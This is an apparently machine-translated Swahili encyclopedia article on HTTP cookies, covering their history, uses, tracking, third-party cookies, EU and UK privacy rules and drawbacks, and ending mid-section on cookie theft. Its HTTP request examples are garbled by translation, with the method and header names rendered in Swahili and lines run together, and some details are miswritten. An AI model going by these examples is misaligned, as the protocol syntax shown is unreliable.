Kuki ya Mtandao: ni nini? Ufafanuzi, Asili, Aina na Faragha

Un kuki au kidakuzi cha wavuti (Au kuki, iliyofupishwa kama shahidi in Quebec) inafafanuliwa na itifaki ya mawasiliano ya HTTP kuwa ni mfuatano wa taarifa zinazotumwa na seva ya HTTP kwa kiteja cha HTTP, ambacho seva hiyo hurejesha kila wakati seva hiyo hiyo ya HTTP inapoulizwa chini ya hali fulani.

Keki ni sawa na a faili ndogo ya maandishi iliyohifadhiwa kwenye terminal ya mtumiaji wa mtandao. Zinazokuwepo kwa zaidi ya miaka 20, zinaruhusu wasanidi wa tovuti kuhifadhi data ya mtumiaji ili kurahisisha urambazaji wao na kuruhusu utendakazi fulani. Vidakuzi vimekuwa na utata mwingi au kidogo kwa sababu vina mabaki ya maelezo ya kibinafsi ambayo yanaweza kutumiwa na watu wengine.

Inatumwa kama kichwa cha HTTP na seva ya wavuti kwa kivinjari ambacho huirudisha bila kubadilika kila inapofikia seva. Keki inaweza kutumika uthibitishaji, kikao (matengenezo ya serikali), na kwa kuhifadhi habari maalum kuhusu mtumiaji, kama vile mapendeleo ya tovuti au yaliyomo kwenye toroli ya ununuzi ya kielektroniki. Neno kuki limechukuliwa kutoka kuki ya uchawi, dhana inayojulikana sana katika kompyuta ya UNIX, ambayo iliongoza wazo na jina la vidakuzi vya kivinjari. Kuna mbadala chache za vidakuzi, kila moja ikiwa na matumizi yake, faida na hasara.

Kwa kuwa faili za maandishi rahisi, vidakuzi havitekelezwi. Wao si wala spyware wala virusi, ingawa vidakuzi kutoka kwa tovuti zingine hugunduliwa na programu nyingi za kuzuia virusi kwa sababu huruhusu watumiaji kufuatiliwa wanapotembelea tovuti nyingi. 

Vivinjari vingi vya kisasa huruhusu watumiaji kufanya hivyo kuamua kama kukubali au kukataa cookies. Watumiaji wanaweza pia chagua muda gani vidakuzi vinahifadhiwa. Hata hivyo, kukataliwa kabisa kwa vidakuzi hufanya baadhi ya tovuti zisitumike. Kwa mfano, hifadhi mikokoteni ya ununuzi au tovuti zinazohitaji kuingia kwa kutumia vitambulisho (jina la mtumiaji na nenosiri).

Historia

Neno cookie linatokana na istilahi ya Kiingereza kuki ya uchawi, ambayo ni pakiti ya data ambayo programu hupokea na kurejesha bila kubadilika. Vidakuzi vilikuwa tayari kutumika katika IT wakati Lou Montulli alikuwa na wazo la kuzitumia katika mawasiliano ya mtandao Juni 1994. Wakati huo, alikuwa ameajiriwa na Netscape Communications, ambayo ilikuwa imetengeneza maombi ya e-commerce kwa mteja. Vidakuzi vilitoa suluhu kwa tatizo la kutegemewa kwa utekelezaji wa kikokoteni cha ununuzi cha duka.

John Giannandrea na Lou Montulli waliandika maelezo ya kwanza ya kuki ya Netscape mwaka huo huo. Toleo la beta la 0.9 la Mosaic Netscape, iliyotolewa Oktoba 13, 1994, iliyounganishwa. teknolojia ya kuki (tazama chapisho) Matumizi ya kwanza (yasiyo ya majaribio) ya vidakuzi yalikuwa kubainisha ikiwa wageni kwenye tovuti ya Netscape walikuwa wametembelea tovuti hapo awali. Montulli aliwasilisha ombi la hataza la teknolojia ya vidakuzi mwaka wa 1995, na hataza ya Marekani 5774670 ilitolewa. iliyotolewa mwaka 1998.

Baada ya kutekelezwa katika beta ya Netscape 0.9 mnamo 1994, vidakuzi viliunganishwa kwenye Internet Explorer 2, iliyotolewa mnamo Oktoba 1995.

Utangulizi wa vidakuzi bado haujajulikana sana kwa umma. Hasa, vidakuzi vilikubaliwa kwa chaguo-msingi katika mipangilio ya kivinjari, na watumiaji hawakujulishwa uwepo wao. Baadhi ya watu walijua kuhusu kuwepo kwa vidakuzi karibu robo ya kwanza ya 1995, lakini umma kwa ujumla ulianza tu kuwepo baada ya Financial Times kuchapisha makala mnamo Februari 12, 1996. Katika mwaka huo huo, vidakuzi vilipokea tahadhari nyingi za vyombo vya habari. kwa sababu ya uwezekano wa kuingilia faragha. Mada ya vidakuzi ilijadiliwa katika mashauriano mawili ya Tume ya Biashara ya Shirikisho la Amerika mnamo 1996 na 1997.

Utayarishaji wa maelezo rasmi ya vidakuzi ulikuwa tayari unaendelea. Majadiliano ya kwanza ya maelezo rasmi yalifanyika mnamo Aprili 1995 kwenye orodha ya barua pepe ya www-talk. Kikundi maalum cha kazi cha IETF kiliundwa. Mapendekezo mawili mbadala ya kutambulisha shughuli za HTTP za serikali yalipendekezwa na Brian Behlendorf na David Kristol mtawalia, lakini kikundi, kinachoongozwa na Kristol mwenyewe, kiliamua kutumia maelezo ya Netscape kama mahali pa kuanzia. Mnamo Februari 1996, kikundi cha kazi kiliamua kuwa vidakuzi vya watu wengine ni tishio kubwa kwa faragha. Maelezo yaliyotolewa na kikundi hatimaye yalichapishwa kama RFC 2109.

Kuanzia mwisho wa 2014, tunaona bango kuhusu vidakuzi kwenye tovuti nyingi. Kuna angalau kiendelezi kimoja cha kivinjari kinachoruhusu bendera haijaonyeshwa.

Aina za Vidakuzi na Matumizi

Usimamizi wa kikao

Vidakuzi vinaweza kutumika kudumisha data ya mtumiaji wakati wa urambazaji, lakini pia katika ziara nyingi. Vidakuzi vilianzishwa ili kutoa njia ya kutekeleza mikokoteni ya ununuzi ya kielektroniki, kifaa pepe ambacho mtumiaji anaweza kukusanya bidhaa anazotaka kununua anapovinjari tovuti.

Siku hizi, programu kama vile rukwama za ununuzi badala yake huhifadhi orodha ya bidhaa kwenye hifadhidata kwenye seva, jambo ambalo ni bora zaidi; kuliko kuzihifadhi kwenye kuki yenyewe. Seva ya wavuti hutuma kidakuzi kilicho na kitambulisho cha kipekee cha kipindi. Kisha kivinjari hurejesha kitambulisho hiki cha kipindi kwa kila ombi linalofuata na vipengee kwenye kikapu huhifadhiwa na kuhusishwa na kitambulisho hiki cha kipekee cha kipindi.

Matumizi ya mara kwa mara ya vidakuzi ni muhimu kwa kuingia kwenye tovuti kwa kutumia vitambulisho. Kwa kifupi, seva ya wavuti hutuma kwanza kidakuzi kilicho na kitambulisho cha kipekee cha kipindi. Kisha watumiaji hutoa vitambulisho vyao (kawaida jina la mtumiaji na nenosiri). Programu ya wavuti kisha inathibitisha kipindi na inaruhusu mtumiaji kufikia huduma.

personalization

Vidakuzi vinaweza kutumiwa kukumbuka habari kuhusu mtumiaji wa tovuti, ili kumwonyesha maudhui yanayofaa katika siku zijazo. Kwa mfano, seva ya wavuti inaweza kutuma kuki iliyo na jina la mtumiaji la mwisho lililotumiwa kuingia kwenye tovuti hiyo, ili jina la mtumiaji liweze kujazwa mapema kwenye ziara za siku zijazo.

Tovuti nyingi hutumia vidakuzi kwa ubinafsishaji kulingana na mapendeleo ya mtumiaji. Watumiaji huchagua mapendeleo yao katika fomu na kuyawasilisha kwa seva. Seva husimba mapendeleo kwenye kidakuzi na kuirejesha kwa kivinjari. Baadaye, kila wakati mtumiaji anapata ukurasa wa tovuti hii, kivinjari hurejesha kidakuzi na kwa hivyo orodha ya mapendeleo; seva inaweza kisha kubinafsisha ukurasa kulingana na matakwa ya mtumiaji. Kwa mfano, tovuti ya Wikipedia inaruhusu watumiaji wake kuchagua ngozi ya tovuti wanayopendelea. Injini ya utafutaji ya Google inaruhusu watumiaji wake (hata kama hawajasajiliwa) kuchagua idadi ya matokeo wanayotaka kuona kwenye kila ukurasa wa matokeo.

Kufuatilia

Vidakuzi vya kufuatilia hutumiwa kufuatilia tabia za kuvinjari za watumiaji wa mtandao. Hili pia linaweza kufanywa kwa sehemu kwa kutumia anwani ya IP ya kompyuta kufanya ombi la ukurasa au kwa kutumia kichwa cha 'rejeshi' cha HTTP ambacho mteja hutuma kwa kila ombi, lakini vidakuzi huruhusu usahihi zaidi. Hii inaweza kufanywa kama katika mfano ufuatao:

1. Ikiwa mtumiaji anaita ukurasa kwenye tovuti, na ombi halina kidakuzi, seva inadhani kuwa huu ni ukurasa wa kwanza uliotembelewa na mtumiaji. Seva kisha huunda mfuatano wa nasibu na kuutuma kwa kivinjari pamoja na ukurasa ulioombwa.
2. Kuanzia wakati huu, kidakuzi kitatumwa kiotomatiki na kivinjari kila wakati ukurasa mpya wa tovuti unapoitwa. Seva itatuma ukurasa kama kawaida, lakini pia itaweka URL ya ukurasa unaoitwa, tarehe, saa ya ombi na kidakuzi kwenye faili ya kumbukumbu.

Kwa kuangalia faili ya logi, basi inawezekana kuona ni kurasa gani mtumiaji ametembelea na kwa utaratibu gani. Kwa mfano, ikiwa faili ina maombi machache yaliyofanywa kwa kutumia kidakuzi cha id=abc, hii inaweza kuthibitisha kwamba maombi haya yote yanatoka kwa mtumiaji yuleyule. URL iliyoombwa, tarehe na wakati unaohusishwa na maombi huruhusu kuvinjari kwa mtumiaji kufuatiliwa.

Vidakuzi vya watu wengine na viashiria vya wavuti, vilivyofafanuliwa hapa chini, pia huwezesha ufuatiliaji katika tovuti tofauti. Ufuatiliaji wa tovuti moja kwa ujumla hutumiwa kwa madhumuni ya takwimu. Kinyume chake, ufuatiliaji katika tovuti mbalimbali kwa kutumia vidakuzi vya wahusika wengine kwa ujumla hutumiwa na makampuni ya utangazaji kutoa wasifu wa watumiaji wasiojulikana (ambao hutumika kubainisha ni matangazo gani yanafaa kuonyeshwa kwa mtumiaji na pia kumtumia barua pepe zinazolingana na matangazo haya - TAKA. )

Kufuatilia vidakuzi ni hatari ya uvamizi wa faragha ya mtumiaji lakini vinaweza kufutwa kwa urahisi. Vivinjari vingi vya kisasa vinajumuisha chaguo la kufuta kiotomatiki vidakuzi vinavyoendelea wakati wa kufunga programu.

Vidakuzi vya mtu wa tatu

Picha na vitu vingine vilivyomo kwenye ukurasa wa wavuti vinaweza kukaa kwenye seva tofauti na ile inayopangisha ukurasa. Ili kuonyesha ukurasa, kivinjari hupakua vitu hivi vyote. Tovuti nyingi zina habari kutoka kwa vyanzo tofauti. Kwa mfano, ukiandika www.example.com kwenye kivinjari chako, mara nyingi kutakuwa na vitu au matangazo kwenye sehemu ya ukurasa ambayo yanatoka kwa vyanzo tofauti, i.e. kutoka kwa kikoa tofauti na www. .example.com. Vidakuzi vya "Kwanza" ni vidakuzi ambavyo vimewekwa na kikoa kilichoorodheshwa kwenye upau wa anwani wa kivinjari. Vidakuzi vya watu wengine huwekwa na mojawapo ya vipengee vya ukurasa vinavyotoka kwenye kikoa tofauti.

Kwa chaguomsingi, vivinjari kama Mozilla Firefox, Microsoft Internet Explorer na Opera hukubali vidakuzi vya watu wengine, lakini watumiaji wanaweza kubadilisha mipangilio katika chaguo za kivinjari ili kuvizuia. Hakuna hatari ya usalama iliyo katika vidakuzi vya watu wengine vinavyowezesha utendakazi wa wavuti, hata hivyo hutumiwa pia kufuatilia watumiaji. kutoka tovuti hadi tovuti.

Zana kama vile Ghostery zinazopatikana kwa vivinjari vyote pamoja na Google Chrome zinaweza kuzuia ubadilishanaji kati ya watu wengine.

Utekelezaji

Vidakuzi ni vipande vidogo vya data vilivyotumwa na seva ya wavuti kwa kivinjari. Kivinjari huwarejesha bila kubadilika kwa seva, na kuanzisha hali (kumbukumbu ya matukio ya zamani) katika shughuli ya HTTP isiyo na uraia. Bila vidakuzi, kila urejeshaji wa ukurasa wa wavuti au sehemu ya ukurasa wa wavuti ni tukio la pekee, lisilotegemea maombi mengine yaliyotolewa kwenye tovuti hiyo hiyo. Mbali na kuwa na uwezo wa kuwekwa na seva ya wavuti, vidakuzi vinaweza pia kuwekwa na lugha za maandishi kama vile JavaScript, ikiwa inatumika na kuidhinishwa na kivinjari.

Ubainifu rasmi wa vidakuzi unapendekeza kwamba vivinjari vinapaswa kuhifadhi na kutuma tena idadi ya chini kabisa ya vidakuzi. Hasa, kivinjari kinapaswa kuwa na uwezo wa kuhifadhi angalau vidakuzi 300 vya kilobaiti nne kila kimoja, na angalau vidakuzi 20 kwa seva au kikoa kimoja.

Kwa mujibu wa kifungu cha 3.1 cha RFC 2965, majina ya vidakuzi hayajalishi.

Kidakuzi kinaweza kutaja tarehe ya kuisha muda wake, ambapo kidakuzi kitafutwa tarehe hii. Ikiwa kidakuzi hakielezei tarehe ya mwisho wa matumizi, kidakuzi kinafutwa mara tu mtumiaji anapoondoka kwenye kivinjari chake. Kwa hivyo, kubainisha tarehe ya mwisho wa matumizi ni njia ya kufanya kidakuzi kiishi kupitia vipindi vingi. Kwa sababu hii, vidakuzi vilivyo na tarehe ya mwisho wa matumizi vinasemekana kuwa kuendelea. Mfano wa maombi: tovuti ya rejareja inaweza kutumia vidakuzi vinavyoendelea kurekodi bidhaa ambazo watumiaji wameweka kwenye rukwama yao ya ununuzi (kwa kweli, kidakuzi kinaweza kurejelea ingizo lililohifadhiwa katika hifadhidata kwenye tovuti ya mauzo, na si kwenye kompyuta yako) . Kupitia njia hii, ikiwa watumiaji wataacha kivinjari chao bila kufanya ununuzi na kurejea baadaye, wataweza kupata bidhaa kwenye rukwama tena. Ikiwa vidakuzi hivi havikupa tarehe ya kumalizika muda wake, vingeisha wakati kivinjari kimefungwa, na habari juu ya yaliyomo kwenye kikapu itapotea.

Vidakuzi vinaweza kuwekewa mipaka kwa kikoa maalum, kikoa kidogo au njia kwenye seva iliyoziunda.

Uundaji wa kuki

Uhamishaji wa kurasa za wavuti unafanywa kwa kutumia Itifaki ya Uhamisho wa HyperText (HTTP). Kwa kupuuza vidakuzi, vivinjari huita ukurasa kutoka kwa seva za wavuti kwa kuwatumia maandishi mafupi yanayoitwa Ombi la HTTP. Kwa mfano, ili kufikia ukurasa wa www.example.org/index.html, vivinjari huunganisha kwenye seva www.example.org na kutuma ombi linaloonekana kama hili:

	PATA /index.html HTTP/1.1Mwenyeji: www.example.org
Navigator	→	Serveur

Seva hujibu kwa kutuma ukurasa ulioombwa, ukitanguliwa na maandishi sawa, yote yakiitwa Jibu la HTTP. Kifurushi hiki kinaweza kuwa na mistari inayoelekeza kivinjari kuhifadhi vidakuzi:

	HTTP/1.1 200 OKContent-aina: text/htmlSet-Cookie: name=value (ukurasa wa HTML)
Navigator	←	Serveur

Seva hutuma tu laini ya Set-Cookie, ikiwa seva inataka kivinjari kuhifadhi kidakuzi. Set-Cookie ni ombi kwa kivinjari kuhifadhi kamba ya jina=thamani na kuirejesha katika maombi yote yajayo kwa seva. Ikiwa kivinjari kinaauni vidakuzi na vidakuzi vimewezeshwa katika chaguo za kivinjari, kidakuzi kitajumuishwa katika maombi yote yanayofuata yanayotumwa kwa seva hiyo hiyo. Kwa mfano, kivinjari huita ukurasa www.example.org/news.html kwa kutuma ombi lifuatalo kwa seva www.example.org:

	PATA /news.html HTTP/1.1Mpangishi: www.example.orgCookie: name=valueKubali: */*
Navigator	→	Serveur

Hili ni ombi la ukurasa mwingine kutoka kwa seva hiyo hiyo, na linatofautiana na la kwanza hapo juu kwa sababu lina mfuatano ambao seva ilituma hapo awali kwa kivinjari. Shukrani kwa njia hii, seva inajua kwamba ombi hili limeunganishwa na la awali. Seva hujibu kwa kutuma ukurasa unaoitwa, na pia kwa kuongeza vidakuzi vingine kwake.

Thamani ya kidakuzi inaweza kubadilishwa na seva kwa kutuma laini mpya Set-Cookie: name=new_value kwa kujibu ukurasa unaoitwa. Kivinjari kisha hubadilisha thamani ya zamani na mpya.

Laini ya Set-Cookie kwa kawaida huundwa na programu ya CGI au lugha nyingine ya uandishi, si na seva ya HTTP. Seva ya HTTP (mfano: Apache) itasambaza tu matokeo ya programu (hati iliyotanguliwa na kichwa kilicho na vidakuzi) kwa kivinjari.

Vidakuzi pia vinaweza kuwekwa na JavaScript au lugha zingine zinazofanana zinazoendeshwa kwenye kivinjari, i.e. kwa upande wa mteja badala ya upande wa seva. Katika JavaScript, kitu cha document.cookie kinatumika kwa madhumuni haya. Kwa mfano, taarifa document.cookie = "temperature=20" huunda kidakuzi kinachoitwa "joto" na chenye thamani ya 20.

Sifa za kuki

Kando na jozi ya jina/thamani, kidakuzi pia kinaweza kuwa na tarehe ya mwisho wa matumizi, njia, jina la kikoa na aina ya muunganisho unaokusudiwa, yaani wa kawaida au uliosimbwa kwa njia fiche. RFC 2965 pia inafafanua kuwa vidakuzi lazima ziwe na nambari ya toleo la lazima, lakini hii kwa ujumla imeachwa. Sehemu hizi za data hufuata jozi ya jina=new_value na hutenganishwa na nusukoloni. Kwa mfano, kidakuzi kinaweza kuundwa na seva kwa kutuma mstari wa Set-Cookie: name=new_value; inaisha=tarehe; njia=/; domain=.example.org.

Kuisha kwa kuki

Muda wa vidakuzi huisha na kisha hautumwa na kivinjari kwa seva katika hali zifuatazo:

• Wakati kivinjari kimefungwa, ikiwa kidakuzi hakiendelei.
• Wakati tarehe ya mwisho ya kuki imepita.
• Wakati tarehe ya mwisho wa kuki inabadilishwa (na seva au hati) hadi tarehe ya zamani.
• Wakati kivinjari kinafuta kuki kwa ombi la mtumiaji.

Hali ya tatu inaruhusu seva au hati kufuta kidakuzi kwa uwazi. Kumbuka kwamba inawezekana kwa kivinjari cha wavuti cha Google Chrome kujua tarehe ya mwisho wa kuki fulani kwa kufikia mipangilio ya maudhui. Kidakuzi kilichohifadhiwa kwenye kompyuta kinaweza kubaki hapo kwa miongo kadhaa ikiwa hakuna utaratibu unaochukuliwa kukifuta.

Fikra potofu

Tangu kuanzishwa kwao kwenye mtandao, mawazo mengi kuhusu vidakuzi yameenea kwenye mtandao na kwenye vyombo vya habari. Mnamo 1998, CIAC, timu ya ufuatiliaji wa matukio ya kompyuta ya Idara ya Nishati ya Marekani, iliamua kuwa udhaifu wa usalama wa vidakuzi "haupo kabisa" na kueleza kuwa "taarifa kuhusu asili ya ziara zako na maelezo ya kurasa za wavuti ulizotembelea. tayari zipo kwenye faili za kumbukumbu za seva za wavuti”. Mnamo 2005, Utafiti wa Jupiter ulichapisha matokeo ya utafiti, ambapo asilimia kubwa ya waliohojiwa walizingatia kauli zifuatazo:

• Vidakuzi ni kama virusi, wanaambukiza anatoa ngumu za watumiaji.
• Vidakuzi vinazalisha pop-up.
• Vidakuzi hutumiwa kutuma spam.
• Vidakuzi hutumiwa tu kwa utangazaji.

Vidakuzi haviwezi kufuta au kusoma taarifa kutoka kwa kompyuta ya mtumiaji. Hata hivyo, vidakuzi hufanya iwezekane kugundua kurasa za wavuti zinazotembelewa na mtumiaji kwenye tovuti fulani au seti ya tovuti. Taarifa hizi zinaweza kukusanywa katika wasifu wa mtumiaji ambao unaweza kutumika au kuuzwa tena kwa wahusika wengine, jambo ambalo linaweza kusababisha matatizo makubwa ya faragha. Baadhi ya wasifu hazijulikani, kwa maana kwamba hazina taarifa za kibinafsi, lakini hata wasifu kama huo unaweza kuwa wa kutiliwa shaka.

Kulingana na utafiti huo, asilimia kubwa ya watumiaji wa Intaneti hawajui jinsi ya kufuta vidakuzi. Mojawapo ya sababu zinazofanya watu wasiamini vidakuzi ni kwamba baadhi ya tovuti zimetumia vibaya kipengele cha kujitambulisha cha vidakuzi na kushiriki maelezo haya na vyanzo vingine. Asilimia kubwa ya utangazaji lengwa na barua pepe ambazo hazijaombwa, zinazochukuliwa kuwa taka, hutoka kwa taarifa iliyokusanywa kutokana na kufuatilia vidakuzi.

Mipangilio ya kivinjari

Vivinjari vingi vinaauni vidakuzi na kuruhusu mtumiaji kuvizima. Chaguzi za kawaida zaidi ni:

• Washa au uzima vidakuzi kabisa, ili vikubalike kila mara au vizuiwe.
• Ruhusu mtumiaji kuona vidakuzi vinavyotumika katika ukurasa fulani, kwa kuingiza javascript: alert(document.cookie) katika upau wa anwani wa kivinjari. Baadhi ya vivinjari hujumuisha kidhibiti cha vidakuzi kwa mtumiaji ambaye anaweza kuangalia na kufuta vidakuzi vilivyohifadhiwa kwa sasa na kivinjari.

Vivinjari vingi pia huruhusu ufutaji kamili wa data ya kibinafsi ambayo inajumuisha vidakuzi. Moduli za ziada za kudhibiti ruhusa za vidakuzi pia zipo.

Faragha na Vidakuzi vya Watu Wengine

Katika mfano huu wa uwongo, kampuni ya utangazaji imeweka mabango kwenye tovuti mbili. Kwa kupangisha mabango kwenye seva zake na kutumia vidakuzi vya watu wengine, kampuni ya utangazaji inaweza kufuatilia usogezaji wa mtumiaji kupitia tovuti hizi mbili.

Vidakuzi vina athari muhimu kwa faragha na kutokujulikana kwa watumiaji wa wavuti. Ingawa vidakuzi hurejeshwa tu kwa seva iliyoviweka au kwa seva inayomilikiwa na kikoa sawa cha Mtandao, ukurasa wa wavuti hata hivyo unaweza kuwa na picha au vipengele vingine vilivyohifadhiwa kwenye seva zinazomilikiwa na vikoa vingine. Vidakuzi vinavyowekwa wakati wa kurejesha vipengele hivi vya nje huitwa vidakuzi vya mtu wa tatu. Hii inajumuisha vidakuzi kutoka kwa madirisha ibukizi yasiyotakikana.

Makampuni ya utangazaji hutumia vidakuzi vya watu wengine kufuatilia watumiaji katika tovuti tofauti wanazotembelea. Hasa, kampuni ya utangazaji inaweza kufuatilia mtumiaji katika kurasa zote ambapo imeweka picha za utangazaji au pikseli ya kufuatilia. Ujuzi wa kurasa zilizotembelewa na mtumiaji huruhusu kampuni ya utangazaji kulenga mapendeleo ya utangazaji ya mtumiaji.

Uwezo wa kuunda wasifu wa mtumiaji unachukuliwa na wengine kuwa uvamizi wa faragha, haswa wakati ufuatiliaji unafanywa katika vikoa tofauti kwa kutumia vidakuzi vya watu wengine. Kwa sababu hii, baadhi ya nchi zina sheria ya vidakuzi.

Serikali ya Marekani ilitekeleza sheria kali kuhusu uwekaji wa vidakuzi mwaka wa 2000, baada ya kubainika kuwa Ofisi ya Sera ya Madawa ya White House ilikuwa ikitumia vidakuzi kufuatilia kompyuta za watumiaji wanaotazama matangazo ya dawa mtandaoni. Mnamo 2002, mwanaharakati wa faragha Daniel Brandt aligundua kwamba CIA iliacha vidakuzi vinavyoendelea kwenye kompyuta ambazo zilitembelea tovuti zake. Mara baada ya kufahamishwa juu ya uvunjaji huu, CIA ilitangaza kuwa vidakuzi hivi havikutumwa kimakusudi na iliacha kuviweka. Mnamo Desemba 25, 2005, Brandt aligundua kuwa Shirika la Usalama la Taifa (NSA) lilikuwa limeacha vidakuzi viwili vinavyoendelea kwenye kompyuta za wageni kwa sababu ya sasisho la programu. Baada ya kuarifiwa, NSA ilizima vidakuzi mara moja.

Nchini Uingereza, the Sheria ya kuki ", iliyoanza kutumika mnamo Mei 25, 2012, inalazimisha tovuti kutangaza nia zao, na hivyo kuruhusu watumiaji kuchagua ikiwa wanataka kuacha alama au la juu ya kifungu chao kwenye Mtandao. Kwa hivyo wanaweza kulindwa dhidi ya ulengaji wa matangazo. Hata hivyo, kulingana na Guardian, idhini ya watumiaji wa Intaneti si lazima iwe wazi; mabadiliko yamefanywa kwa masharti ya idhini ya mtumiaji, kuifanya hivyo kumaanisha.

Maelekezo 2002/58 kuhusu faragha

Maelekezo ya 202/58 ya faragha na mawasiliano ya kielektroniki, ina sheria za matumizi ya vidakuzi. Hasa, kifungu cha 5, aya ya 3 ya agizo hili inahitaji kwamba uhifadhi wa data (kama vile vidakuzi) kwenye kompyuta ya mtumiaji unaweza kufanywa tu ikiwa:

• mtumiaji anafahamishwa jinsi data inatumiwa;
• mtumiaji anapewa chaguo la kukataa operesheni hii ya kuhifadhi. Hata hivyo, makala hii pia inasema kwamba uhifadhi wa data kwa sababu za kiufundi hauhusiani na sheria hii.

Kutokana na kutekelezwa kuanzia Oktoba 2003, hata hivyo agizo hilo halikutekelezwa kikamilifu kwa mujibu wa ripoti ya Desemba 2004, ambayo pia ilionyesha kuwa baadhi ya Nchi Wanachama (Slovakia, Latvia, Ugiriki, Ubelgiji na Luxemburg) zilikuwa bado hazijapitisha maelekezo ya sheria za ndani.

Kulingana na maoni ya G29 mnamo 2010, agizo hili, ambalo linaweka masharti haswa matumizi ya vidakuzi kwa madhumuni ya utangazaji wa kitabia, kwa idhini ya wazi ya mtumiaji wa Mtandao bado linatumika vibaya sana. Kwa kweli, tovuti nyingi hufanya hivyo kwa njia ambayo haizingatii maagizo, kwa kujiwekea kikomo kwa "bendera" rahisi inayojulisha matumizi ya "vidakuzi" bila kutoa taarifa juu ya matumizi, bila kutofautisha kati ya vidakuzi vya "kiufundi". "kufuatilia" vidakuzi, wala kutoa chaguo halisi kwa mtumiaji anayetaka kudumisha vidakuzi vya kiufundi (kama vile vidakuzi vya usimamizi wa rukwama za ununuzi) na kukataa vidakuzi vya "kufuatilia". Kwa kweli, tovuti nyingi hazifanyi kazi ipasavyo ikiwa vidakuzi vimekataliwa, ambayo hayatii maagizo ya 2002/58 au maagizo 95/46 (Ulinzi wa data ya kibinafsi).

Maelekezo 2009 / 136 / CE

Nyenzo hii imesasishwa na Maelekezo ya 2009/136/EC ya tarehe 25 Novemba 2009 ambayo yanasema kwamba "kuhifadhi taarifa, au kupata ufikiaji wa taarifa ambazo tayari zimehifadhiwa, katika kifaa cha mwisho cha mteja au mtumiaji inaruhusiwa tu kwa masharti kwamba mteja au mtumiaji ametoa kibali chake, baada ya kupokea, kwa kufuata Maelekezo 95/46/EC, taarifa wazi na kamili, kati ya wengine kwa madhumuni ya kuchakata”. Kwa hivyo, agizo jipya linaimarisha majukumu kabla ya kuweka vidakuzi kwenye kompyuta ya mtumiaji wa Mtandao.

Katika mazingatio ya awali ya agizo hilo, mbunge wa Ulaya anabainisha hata hivyo: "Inapowezekana kiufundi na kwa ufanisi, kwa mujibu wa masharti husika ya Maelekezo 95/46/EC, idhini ya mtumiaji kuhusu usindikaji inaweza kuonyeshwa kupitia matumizi ya mipangilio ifaayo ya kivinjari au programu nyinginezo”. Lakini kwa kweli, hakuna kivinjari hadi sasa kinachowezesha kutenganisha vidakuzi muhimu vya kiufundi kutoka kwa vile vya hiari ambavyo vinapaswa kuachwa kwa chaguo la mtumiaji.

Agizo hili jipya lilipitishwa na Wabunge wa Ubelgiji Julai 2012. Utafiti wa 2014 unaonyesha kuwa hata Wabunge wanajitahidi kuomba. vikwazo vya maagizo.

P3P

Vipimo vya P3P ni pamoja na uwezo wa seva kutaja sera ya faragha, ambayo hufafanua ni aina gani ya taarifa inazokusanya na kwa madhumuni gani. Sera hizi ni pamoja na (lakini sio tu) matumizi ya maelezo yaliyokusanywa kwa kutumia vidakuzi. Kulingana na ufafanuzi wa P3P, kivinjari kinaweza kukubali au kukataa vidakuzi kwa kulinganisha sera za faragha na mapendeleo ya mtumiaji au kwa kumuuliza mtumiaji, kuwasilisha taarifa ya faragha ya sera ya faragha iliyotangazwa na seva.

Vivinjari vingi, ikiwa ni pamoja na Apple Safari na matoleo ya 6 na 7 ya Microsoft Internet Explorer, vinaauni P3P ambayo inaruhusu kivinjari kubaini ikiwa kitakubali hifadhi ya vidakuzi vya watu wengine. Kivinjari cha Opera huruhusu watumiaji kukataa vidakuzi vya watu wengine na kuunda wasifu wa usalama wa kimataifa na mahususi kwa vikoa vya Mtandao. Toleo la 2 la Mozilla Firefox liliacha kutumia P3P lakini likairejesha katika toleo la 3.

Vidakuzi vya watu wengine vinaweza kuzuiwa na vivinjari vingi ili kuongeza faragha na kupunguza ufuatiliaji wa matangazo, bila kuathiri vibaya matumizi ya wavuti ya mtumiaji. Mashirika mengi ya utangazaji hutoa chaguo opt nje kwa utangazaji unaolengwa, kwa kusanidi kidakuzi cha jumla kwenye kivinjari ambacho huzima ulengaji huu, lakini suluhisho kama hilo halifanyi kazi kivitendo, linapoheshimiwa, kwa sababu kidakuzi hiki cha kawaida hufutwa mara tu mtumiaji anapofuta vidakuzi hivi ambavyo hughairi kuchagua. uamuzi nje.

Hasara za kuki

Mbali na masuala ya faragha, vidakuzi pia vina mapungufu ya kiufundi. Hasa, sio daima kutambua kwa usahihi watumiaji, wanaweza kupunguza kasi ya utendaji wa tovuti wakati kwa idadi kubwa, wanaweza kutumika kwa mashambulizi ya usalama, na wanapingana na uhamisho wa hali ya mwakilishi, mtindo wa usanifu wa programu.

Utambulisho usio sahihi

Ikiwa zaidi ya kivinjari kimoja kinatumiwa kwenye kompyuta, kila wakati kuna kitengo tofauti cha kuhifadhi kwa vidakuzi. Vidakuzi kwa hivyo havitambulishi mtu, lakini mchanganyiko wa akaunti ya mtumiaji, kompyuta na kivinjari. Kwa hivyo, mtu yeyote anaweza kutumia akaunti hizi, kompyuta, au vivinjari ambavyo vina vidakuzi. Vile vile, vidakuzi havitofautishi kati ya watumiaji wengi wanaotumia akaunti moja ya mtumiaji, kompyuta, na kivinjari, kama vile "mikahawa ya mtandao" au sehemu yoyote inayotoa ufikiaji bila malipo kwa rasilimali za kompyuta.

Lakini katika mazoezi kauli hii inageuka kuwa ya uwongo katika hali nyingi kwa sababu leo ​​kompyuta "ya kibinafsi" (au simu mahiri, au kompyuta kibao, ambayo ni mbaya zaidi) inatumiwa hasa na mtu mmoja.Hii ni sawa na kumlenga mtu mahususi na kupitia wingi wa taarifa zilizokusanywa fika kwenye ulengaji wa kibinafsi hata kama mtu "haitambuliki".

Wizi wa vidakuzi

Kidakuzi kinaweza kuibiwa na kompyuta nyingine kwenye mtandao.

Wakati wa operesheni ya kawaida, vidakuzi hurejeshwa kati ya seva (au kikundi cha seva kwenye kikoa sawa) na kivinjari cha kompyuta cha mtumiaji. Kwa kuwa vidakuzi vinaweza kuwa na habari nyeti (jina la mtumiaji, nenosiri linalotumika kwa uthibitishaji, n.k.), maadili yao hayapaswi kupatikana kwa kompyuta zingine. Wizi wa vidakuzi ni kitendo cha kuingilia vidakuzi na mtu mwingine ambaye hajaidhinishwa.

